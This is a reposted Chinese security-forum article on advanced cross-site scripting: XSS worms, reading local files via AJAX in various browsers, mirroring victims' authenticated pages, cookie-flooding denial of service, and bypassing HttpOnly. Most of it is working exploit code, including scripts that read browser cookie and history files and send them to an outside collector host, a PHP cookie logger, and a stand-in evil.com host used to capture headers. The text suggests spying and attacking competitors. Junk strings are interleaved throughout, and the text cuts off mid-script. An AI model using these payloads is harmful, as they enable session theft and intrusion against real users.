中国网络渗透测试联盟

标题: XSS的高级利用部分总结 -蠕虫 [打印本页]

---

作者: admin    时间: 2012-9-13 17:13
标题: XSS的高级利用部分总结 -蠕虫
XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页
7 ?! H4 D6 l/ n本帖最后由 racle 于 2009-5-30 09:19 编辑
9 Z+ ?( }" {% U+ c: }2 A; {
/ j2 |& |8 O7 R6 M/ zXSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页
3 z. B- h  K! h2 h6 ^' ~/ ]By racle@tian6.com   
9 k$ N- e1 ]3 t. @/ Q5 lhttp://bbs.tian6.com/thread-12711-1-1.html
! [# A) f, y* q2 z  b转帖请保留版权



, h+ i" W4 i( B-------------------------------------------前言---------------------------------------------------------


- ^! F; ~+ ^& k# Q本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.
2 {2 I7 J& z; n; d# d- V) d
# u$ r& I* J7 F" _) t* Y* N, I/ n/ L! K
( u. \! m% `7 T! W( }) A* v, Y# S如果你还未具备基础XSS知识,以下几个文章建议拜读:
http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/        JavaScript中文简介
http://www.google.com/search?q=XSS+%D3%EF%BE%E4        XSS语句大全
! N3 j7 I) \! {http://www.google.com/search?q=XSS+%C8%C6%B9%FD        XSS语句绕过
) P3 O/ U! H5 G; V' C5 W6 vhttp://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt        FLASH CSRF
http://bbs.tian6.com/thread-12239-1-1.html        突破XSS字符数量限制执行任意JS代码
http://bbs.tian6.com/thread-12241-1-1.html        利用窗口引用漏洞和XSS漏洞实现浏览器劫持
& x9 L9 }: t( i* u3 o0 a


0 T5 n- M6 P9 s; m
如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.
8 X7 s# B8 Y5 M) d) d2 e
; l5 @3 }" E' x* f希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.

, u( c$ S' U# y1 r8 x如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS    6次XSS蠕虫版本变化,
6 p0 M( p; H4 p2 f3 g
0 D; R9 E$ ~9 j$ c1 e9 t  ABaidu xss蠕虫         感染了8700多个blog.媒体影响力,关注度巨大
, R3 G: u$ R0 ^' G, [
6 |- d+ C2 q! B1 EQQ ZONE,校内网XSS     感染过万QQ ZONE.
6 `/ v/ J0 Z7 a
OWASP MYSPACE XSS蠕虫        20小时内传染一百万用户,最后导致MySpace瘫痪

..........
. I5 y: D' |1 ]8 t# z8 H- r复制代码------------------------------------------介绍-------------------------------------------------------------

什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.
$ u4 Y7 z2 h4 A' b* \
, G3 E% k6 i0 k' g3 y

) D+ ?, R# |- Q; Q' x6 I跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息（Cookie）,由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.

5 i  J# V& C' N6 i

% A. D# S7 K* R9 X0 g& h如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
我们在这里重点探讨以下几个问题:
; d1 h1 N) q4 @. o4 c- ]) o
# r' U, q# y& c3 E1        通过XSS,我们能实现什么?

! m" y% P  ~! [' r  l2        如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?

3        XSS的高级利用和高级综合型XSS蠕虫的可行性?

" o, y  a' T' x% K$ R$ I! g4        XSS漏洞在输出和输入两个方面怎么才能避免.
* z0 K% N9 X3 Q/ b5 k' [


------------------------------------------研究正题----------------------------------------------------------
. J5 |4 J- p) @5 b. d: v! L- P# c
4 T; t* z) p1 k0 C

0 h8 T- w% H9 M通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
9 \) s) v. Z/ t复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
5 W; c$ S/ n  p  U# x0 t4 q复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
8 P2 o# D8 E- w* o; [) [2 [3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
4:Http-only可以采用作为COOKIES保护方式之一.


4 V0 M: v5 F$ r) J& v
! i  U# `% K, E- V2 t2 W

(I) AJAX在不同的浏览器下的本地文件操作权限读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)
( H4 d/ U3 y' O' @2 }
我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息:    1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的，看来MS对IE这类安全风险比较重视。(这有一些问题，随后修正!)

2 n1 [! z- G* i5 F4 {" R2 l
# H9 Z0 E- f9 }+ U4 D
) k# O& y3 G! h4 Y    2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。
- f2 Z# _- M; L% l( i8 W
4 m2 S6 s" R& _4 N7 e* Y; d8 t7 M8 W$ `  d

    3: opera9.64及以下版本允许通过指定url为file://协议进行访问；如果文件在当前目录下，则不需要指定file://协议；如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。



# l1 {) q0 Q! s% P' [0 f' }    4: 基于webkit内核：google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
' b, X7 |& J( g4 Q+ R复制代码IE6使用ajax读取本地文件    <script>

* Z9 {) o( B" e2 _2 V' y( G8 m! e    function $(x){return document.getElementById(x)}
7 F4 G7 g) v6 J0 t  k9 m$ I' E

1 W' L/ m7 U9 r8 m) C  T4 H4 s" O
! ~% u6 R. c& Y4 p8 u7 h    function ajax_obj(){

! `) x6 ]3 |( D    var request = false;

/ v; J% l" ^2 m, N    if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

    } else if(window.ActiveXObject) {
) B. B6 g; }9 O# E% d
7 S' Q7 w" z; A: }    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
5 f$ v& a$ `1 x( n. j1 Q


6 t' j% j9 X8 ~# _/ v    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
% {3 z8 ^3 y& Q# L& ]5 z* G( [# [
    for(var i=0; i<versions.length; i++) {

    try {
9 H% |* }# a/ G4 v8 C
* R* x) C, a: @: [' g/ G) ?    request = new ActiveXObject(versions);

    } catch(e) {}

    }
6 a9 O, x3 E: P
    }

    return request;

" g! |# _/ A0 U    }

    var _x = ajax_obj();
8 R2 h) w- {" q: }
    function _7or3(_m,action,argv){

    _x.open(_m,action,false);

* \. i$ e$ @. l( Y+ m    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

/ E6 \8 ~. w4 L/ b# W9 _9 q/ G    _x.send(argv);

+ q5 P* R, r: F9 l. Q4 x    return _x.responseText;
9 b5 }" q& N  s4 u
    }
6 G7 M1 m% F; h4 R6 u
: }+ @- I6 y  ^6 }, C
. v  h( ?  Q7 c% e4 U1 A
    var txt=_7or3("GET","file://localhost/C:/11.txt",null);
# `3 p7 H) T# E6 A/ [; ]
2 `2 J1 h; }+ Y, ]7 U  y4 M    alert(txt);
* n; i3 r3 O0 B: r. c

4 [3 j2 e0 G" k9 @/ h! ~6 {
    </script>
( R$ }$ \7 h3 ]- @- i7 ^复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.    <script>
, X: [# C& L) P# Z' U
    function $(x){return document.getElementById(x)}
/ m. Z  y* W9 M" M: L


    function ajax_obj(){

    var request = false;

    if(window.XMLHttpRequest) {

4 m: \  D$ B* {$ K    request = new XMLHttpRequest();

* _' p5 q( X6 B% L    } else if(window.ActiveXObject) {
/ I  Y" Q, q- ^2 g
1 d* ]- t9 z3 ]: I7 a, @+ g+ e' `0 o( {' l6 u    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
! w7 F; K% t# q/ o" Y$ Q( K

' B, Z# o$ {7 x$ r, g: Q3 z+ K
    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

3 ]4 f+ E4 i& m) ~1 N$ l$ F- q& m5 S    for(var i=0; i<versions.length; i++) {

% L3 `5 S7 a: f4 y& |; Q4 ^    try {

    request = new ActiveXObject(versions);

    } catch(e) {}

    }

    }

    return request;

    }

) G( S4 c  E7 B! x4 B, p) E5 l    var _x = ajax_obj();
4 \: n: N* c, r' _0 B* v4 R
    function _7or3(_m,action,argv){
7 Q' I, F+ o* ]- d! X4 W
  N0 @! H& G4 {) T    _x.open(_m,action,false);

7 ^5 K) d4 ], K$ i- F    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- B- J7 U8 T1 L' s/ @9 C$ r  a3 {9 f
, {0 {" m7 m; X& k  C    _x.send(argv);

0 g" M* ~- _& H0 [% i    return _x.responseText;
" ~# F* d* Q) I; k) ~+ ^
) w( q6 J8 s0 E  n: G( t9 ~    }



    var txt=_7or3("GET","1/11.txt",null);

    alert(txt);
& F9 o+ x& a1 v
; @6 l  ]: P, q- }/ L& T5 i

    </script>
7 H1 E/ v3 ]; K" o复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”

2 l4 K) }- }9 h9 y+ ^" d

Chrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"


6 Z# H6 P% X7 s) J  t+ O8 h. y( g0 `
$ c% h# b& `$ |<?   
2 z* q; P# q! s0 l6 f, G
6 e  {9 V- e; r, B/*  
$ m3 T) h4 m% I5 N4 x% b8 e5 c
     Chrome 1.0.154.53 use ajax read local txt file and upload exp  
& y5 q  V# G9 [0 T
     www.inbreak.net   

; C$ z7 f/ Q2 ?- J0 B     author voidloafer@gmail.com 2009-4-22   

6 X8 ~$ c& j& V) W6 l- R1 f     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.  
! m  K* V) e; Y8 O8 M
*/  

header("Content-Disposition: attachment;filename=kxlzx.htm");   

6 d. `/ {" t* c4 ]# Qheader("Content-type: application/kxlzx");   
+ ]2 l  `) ~& O) b, K! k
: ?9 G! o, B3 n7 q# f" ~  v1 ~4 ?/*  
& ~! C/ I) a  ^% a6 d
     set header, so just download html file,and open it at local.  
4 I; i1 D8 `" O. z+ X8 _' }
9 _7 y" Z# g! I8 o1 b" z/ l! e*/  
6 Y% }4 H' p8 M4 C, f
( K. R2 ^! F, y/ z) u$ h?>   

; f+ \, y6 V# P; `4 U  J3 k<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="OST">   
# h4 p; O3 g: e  P
( b# ?) \# B0 }4 [3 c* M     <input id="input" name="cookie" value="" type="hidden">   
  f+ m1 N3 F: f5 d2 j. a. E
0 K* z9 S3 V2 K+ B/ W</form>   

' d" M5 _4 [) x6 ^! C/ P% I<script>   

function doMyAjax(user)   
( L& p- b0 f( Y3 l9 @3 C
6 A: _. U' b% Z$ h{   
. C' t5 W$ R/ s  R& V
var time = Math.random();   

. g- V/ A1 L6 a6 P4 v/*  
/ n: r0 z& r0 r
the cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default  

) v$ x( g. Q$ s; c5 [and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History  

and so on...  

*/  
" N. |5 c8 }: P) X& p+ ?
var strPer = 'file://localhost/C:/Documents and Settings/'+user+'/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time='+time;   
4 L( `& D8 J4 S& y7 j7 O
   
# ?0 m# Y5 h& ~! j) S9 {2 o0 }
$ X4 j' b" P. J2 c& ystartRequest(strPer);   


$ K6 K* L; U4 P3 Q0 n% O" F
}   

6 l# j  c, y* v: r" d) t; _2 ?5 T   

function Enshellcode(txt)   
$ y' E( J' q/ _
$ _) T2 o) @2 `6 R  B{   

- [, Y/ G9 u4 x8 kvar url=new String(txt);   

var i=0,l=0,k=0,curl="";   
0 P; M/ d5 K5 x
5 T& G! w* L- i' o4 f: l- @  }l= url.length;   
6 ]+ A/ b) W& {8 Q
6 g) |7 q- i4 V. c6 Q9 R% zfor(;i<l;i++){   

k=url.charCodeAt(i);   
, L  N( k4 \; r8 M
if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}   
8 c0 y- x+ V8 ^/ d0 J2 X
; ?' Y4 s# g9 t9 Wif (l%2){curl+="00";}else{curl+="0000";}   
6 O* `1 @. g: G8 V/ p
curl=curl.replace(/(..)(..)/g,"%u$2$1");   

* l  t4 f; l( c4 b' Y: Ireturn curl;   

}   
) c' Z7 p( x1 p  ?) v' m
- u/ P. ]2 D  U2 `  m- @6 O, A( T: T   
0 [0 n2 K0 w. {( T
   
! i- O- O5 ^: }# Z# c8 |
var xmlHttp;   
1 |! r& }; d+ c$ ?9 i$ M5 K0 E- ]
+ @: @% R. A! j' f( Ufunction createXMLHttp(){   

     if(window.XMLHttpRequest){   
3 }- w4 T/ Q$ |7 X$ Y
xmlHttp = new XMLHttpRequest();           

     }   

     else if(window.ActiveXObject){   

xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   
7 {: P' A5 s# d7 s4 M% L( N
% C# i7 }6 Y* H0 s# X8 c( ~9 I     }   

* o7 ?- u! Q5 }  A- x}   

   
5 t6 t; v4 K  o9 H
function startRequest(doUrl){   

   

0 w1 L2 z; H3 ?) |, m+ S     createXMLHttp();   

: R+ f6 N5 O4 p
- o. J" ?" ]' J
' z9 i/ J4 P+ }/ p5 E7 m+ B     xmlHttp.onreadystatechange = handleStateChange;   
) n; `. R% l$ g, n' C2 m

9 N: Q+ `( }) e( c8 G
6 l8 C8 T( t) j- f9 C% l     xmlHttp.open("GET", doUrl, true);   



" U' |% W0 S$ l     xmlHttp.send(null);   
' ]# N. R( ?5 o+ K2 T; t# N


1 d' C. t; J* K' P5 X1 H' g& l( h
, z* F& j$ d' F" I! Q/ Y. Q' ?
}   

   

function handleStateChange(){   
, d+ L( F' J. R% }- h4 M
; }  n* P3 ]+ X3 b3 a% R; F0 d     if (xmlHttp.readyState == 4 ){   

7 D7 W0 q+ B) ]" L' a     var strResponse = "";   
% ]4 O( k! W- {# x9 ^
/ y6 _! _1 z: {! W" {     setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);   

        
. f0 @, z* {1 |9 r* ?
     }   
4 C+ L5 a( G3 P
7 R' W0 h6 k* r" ^7 e2 E% I4 z}   
. b* Z. r7 W% S% k( S
   

   

0 q; Z9 v* a) v5 _1 I1 ~function framekxlzxPost(text)   
- y% Q, d! H4 K& i2 h7 n
{   
, D1 B- \! }% l7 q
; x  N: J: t" r     document.getElementById("input").value = Enshellcode(text);   
& y( B, q# v9 b/ T  o
     document.getElementById("form").submit();   
; D3 [# U* \( C+ a1 `. S* d* X
8 F3 w" Q+ s% ^5 B6 a}   

3 B6 [/ Z7 z1 i   

doMyAjax("administrator");   
/ U0 a& O+ r6 s$ u% F
( p/ W" n2 D1 m6 z% g   
5 y9 x/ }# l3 v- ?( V- d+ c. C/ w
9 R7 I. |6 G& b: I6 V+ B</script>
复制代码opera 9.52使用ajax读取本地COOKIES文件<script>  
: Z  R" ]* F, y+ j0 L
, W% g9 Z2 l$ F1 K% }2 Hvar xmlHttp;  

, c4 b# u( I2 x- b) p) bfunction createXMLHttp(){  
7 z1 W- n( h$ l% Q
* P' D5 O" K0 e. b, [/ [- c     if(window.XMLHttpRequest){  
) T; M5 D: o4 u0 e
         xmlHttp = new XMLHttpRequest();         

: F+ A& S( F/ E1 Q( H     }  
9 c; y0 E$ S3 u$ x- l
     else if(window.ActiveXObject){  

8 U) K4 R8 V/ O, U2 l         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  

8 |& N( @. g& w* u) `3 s, s     }  
# ~* M* @7 ^. [/ |9 o9 j6 n) Q3 m
}  
- m+ Q$ z& g5 P& X  M: A( V
6 V: L1 t  A9 ?* G# T   

function startRequest(doUrl){  

           
0 T, q" Y; ^" Y3 z, c. p2 E* N) z
) j8 R1 }7 d& |( F& C* A     createXMLHttp();  
% G6 h1 y3 L7 r
1 ^8 W/ o2 B8 Y/ p2 _      
3 |9 k) z7 Z6 r. B% K
( e: s( \+ _9 y/ j2 `     xmlHttp.onreadystatechange = handleStateChange;  
) {8 `6 {2 r1 m0 L* u
      
- _5 A+ H: t7 h. H, F$ ]# n$ s9 C. s# s
2 F! ]2 s; x; X* O0 n     xmlHttp.open("GET", doUrl, true);  
4 b6 ]  f0 }  I! P
      
3 `0 U6 ^+ u; s- h" A
     xmlHttp.send(null);  

      
; I. Z8 w# P" @1 L- h! h
      

}   

   

: ~0 U' d$ j( \% _( rfunction handleStateChange(){  
: S- G- B  e9 R9 }
& V( `  }  ]/ x3 x. y7 _: t% g5 _     if (xmlHttp.readyState == 4 ){  

             var strResponse = "";  
2 K8 n7 A/ \4 H5 I* s
1 \& X+ Q: E* @2 P             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   

               

+ i7 P  X8 c% _8 J" e     }  

}  

/ p: x# Q$ f4 r: Z  Z6 v. o   

8 t2 `, `- J1 F$ @! Ifunction doMyAjax(user,file)  
7 l( o8 g" Z. ]4 A2 w6 Z5 g
: V8 g9 U/ b6 y& p: E2 E{  
* X; S0 m0 i3 Y  Q0 k8 r$ H$ [
( l; Z# N+ C3 Z* o5 r4 o% s% y: Y         var time = Math.random();  

: b! P' x& ]+ G+ B, K           

         var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;  
/ O2 R+ O  v, A+ J9 c* O& \- i# P
, }% r  R0 I" o           
: ?: C; k# t, _0 v1 t1 f
         startRequest(strPer);  
* E3 C. u7 D* C/ t* u0 v7 F
% x6 O( P' X& G" l      
) m+ |1 k8 p  _8 C2 e' i# @/ X
}  

- h' t0 f9 L( ~0 C   
( Z' W( A$ A, W! l* s+ `
function framekxlzxPost(text)  
% ?" @' B0 x: ~
; z& J- q. H  n6 }6 B* k8 ]{  

     document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  
3 z; M  a  `' I4 Y) l# d
3 |7 z- i# ?# [     alert(/ok/);  

- z. S" n* |3 x$ c3 w$ H) O}  
! v2 c1 r2 t8 I  E0 z6 U: u" t, e
   
% k" o. {0 I# s4 U- A( ]5 ?
# L" ^  n4 ?* a+ B1 GdoMyAjax('administrator','administrator@alibaba[1].txt');  
5 P# ~  Q2 I! J( V. @7 O) c: \
' Q9 L' ]# r: i( n- e5 w   
5 Y$ n+ t! q* F* U4 v3 h9 ]5 q
2 X  z6 c+ G, s+ B. ]: ~" d" ~</script>

9 ]; k3 W' P( R$ Y% q$ j' u" X# O( \, b0 n


8 u$ m: O9 J6 r3 C: S# R9 R7 T
+ Z) h2 K6 Q  Sa.php
! m( x7 Q! p6 `  P9 P
( b' x+ Q  ]! q4 C; |$ a4 J
7 p0 M, @3 J: J# {5 G! y. \
<?php      

   

$user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  

$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   

- _1 m0 e. f- J' D  
7 z  F+ U3 Z) F  d
6 U, M2 k. S+ V' }$fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     
8 _: [& s6 Q7 r( O
9 o* w8 i; h* {# a8 Nfwrite($fp,$_GET["cookie"]);      

fclose($fp);   
3 B+ g8 K4 n9 z  Y) P
2 i! p7 x8 B: a! Q, e?>
8 k$ b$ a: @+ K# ^6 E复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:

或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.
0 N. N( ^6 c. i6 Y* I0 E
: u4 \6 [- ~1 s/ T( e8 S( o代码片段://xmlHttpReq.open("GET","AWebSiteWhichYouNeedToCatch.com",false);

, k3 g, Y0 U/ E7 r' L  n. w//xmlHttpReq.open("GET","http://friend.xiaonei.com/myfriendlistx.do",false);

//xmlHttpReq.open("GET","http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx",false);

function getURL(s) {

var image = new Image();
* f8 b! G6 U: b" R
image.style.width = 0;
% D. k) Q1 D7 o4 ]
6 b; k' c8 R# F3 mimage.style.height = 0;
: i8 K- f% c8 A5 ^9 K7 t( }
* O8 [. [6 `" X: F- g) _, oimage.src = s;

}

getURL("http://urwebsite.com/get.php?pagescopies="+xmlHttpReq.responseText);
8 S, A/ i0 l# c& E复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
这里引用大风的一段简单代码:<script language="javascript">

var metastr = "AAAAAAAAAA"; // 10 A
( z; r: q* H& p" I5 ~8 j  `
; P+ t6 V4 x, s; r3 @. ~var str = "";

2 K# ]9 B; G; G7 b. i0 j  Bwhile (str.length < 4000){
' K# t9 R' o3 r: I1 v+ @, a
    str += metastr;
- Y8 y2 m5 D1 ~
9 |* d3 \3 Y3 @: S7 g}

$ V/ ]# K* `0 [# v' s
% \* y* A% r4 W# C
4 N' g1 i, ^  x7 N. S9 Zdocument.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS
/ g1 c% r  h; }. m* H# E7 m
, W- G; D3 ~$ I3 `# @7 _</script>

详细代码请看:http://hi.baidu.com/aullik5/blog ... aeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
) W5 g5 D/ c1 p8 `0 h+ o, Eserver limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150

假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.
# i4 S- T& q$ \/ z5 h




) Z% O; s9 N' h5 P7 o
(III) Http only bypass 与 补救对策:
% s& y( A; B; `  k- A
什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性，用以阻止客户端脚本访问Cookie.
6 j7 Y' g6 Y' U' Z7 p1 B& o以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。<script type="text/javascript">

<!--

+ b4 [& {! v2 E3 R) d2 lfunction normalCookie() {

document.cookie = "TheCookieName=CookieValue_httpOnly";
/ c5 G( T, Q1 O" ~# d
alert(document.cookie);

5 \5 s0 e7 c. l; X7 e}


# h! L0 j& Q! _2 w4 f1 l( ]
" u4 I8 E- |: s2 d: a0 x3 {1 E

function httpOnlyCookie() {

document.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";

, E4 u' d  h0 C/ t+ {8 Malert(document.cookie);}

, C6 n6 a5 O( w9 [9 F; m# e( K1 J

3 ?" K1 u& G5 X( d& P8 t/ r//-->
! o3 w2 W$ |! A1 b% _
</script>


' x/ U& |- m9 q
<FORM><INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE='Display Normal Cookie'>
$ q) t( T& T* f, j7 n; j
- A7 }* Q. V* \# ~4 K0 \<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE='Display HTTPONLY Cookie'></FORM>
+ I2 u  T: j, O, \, J: i复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:<script>
1 l# K  g' k/ L% e
8 U7 w) W. I4 ^* @4 x. ~. M. U

var request = false;
- t. S0 B% M: J$ N
& t8 f  v& T3 |& m1 @        if(window.XMLHttpRequest) {

9 y! ^  L* O1 S8 S            request = new XMLHttpRequest();

            if(request.overrideMimeType) {

                request.overrideMimeType('text/xml');

            }
! r5 ]- v1 s. F0 Q
, z5 Y$ I( q; `8 T  j# [  o1 ^        } else if(window.ActiveXObject) {

            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
1 Z; J/ |" X9 h- t: n1 m
; F/ I/ u( b" u% h9 f+ t1 F) {            for(var i=0; i<versions.length; i++) {
, k$ p2 l( f, D6 T
                try {

                    request = new ActiveXObject(versions);

                } catch(e) {}
* W2 \$ Q. ^0 _5 G
            }

        }
' B- e" f' p2 H, A+ C6 ~7 c  d8 A
xmlHttp=request;
+ i/ A% x' ~/ v' @5 L- I
xmlHttp.open("TRACE","http://www.vul.com",false);

xmlHttp.send(null);

# O6 o& D5 R: x+ U1 t+ @7 ?& KxmlDoc=xmlHttp.responseText;

7 h  j: O# ?0 l4 H9 m7 P2 ?alert(xmlDoc);

1 }0 `4 P& p) J$ L0 b6 D</script>
复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.<script>

( ~- M5 e6 K- W( O' m, zvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

, B4 T6 |& n5 A; p+ V9 KXmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

4 |1 y- X5 ^, ]  ]XmlHttp.send(null);

- g. O' Q7 A% c1 j1 I; dvar resource=xmlHttp.responseText
: R$ \" s" i1 Q& Z' B3 h0 v: m& @
+ |) `& y" u7 iresource.search(/cookies/);
0 c: ]: i2 i( a3 B3 S2 i! K. }4 ~
......................

</script>


& v( S) `' K/ H" X2 z
) z, b$ E# `3 S- @7 y5 E, n8 ^3 l

. H& B; Z9 ^! [1 {, s如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求

[code]

: Q" W) h  V1 J; \; YRewriteEngine On
+ q& v) y9 Y5 |4 ^/ z  f
RewriteCond %{REQUEST_METHOD} ^TRACE

RewriteRule .* - [F]

% x: q  R! ?* E+ W0 N$ J
& ^4 `1 r8 ^- w: z2 x1 V% [
Squid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求

acl TRACE method TRACE

...

http_access deny TRACE
/ n. u* v0 r* Y) P, V+ d: d复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.<script>
* }# c5 q6 J! {7 F; j, W9 }
+ `- N3 N: l* }0 j. Y+ `var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
2 S2 }" H: A# k" |5 S$ D$ j
XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

7 i; w) Z' E$ uXmlHttp.send(null);

</script>
3 X; w/ q3 O4 I7 n7 r+ m/ K. J+ F* n5 M复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.<script>
/ m+ b- f. E* h, K
: V* [9 J+ _. `5 i# E0 Y) V6 g( tvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
% A, c1 ~/ c: [7 J7 F, \
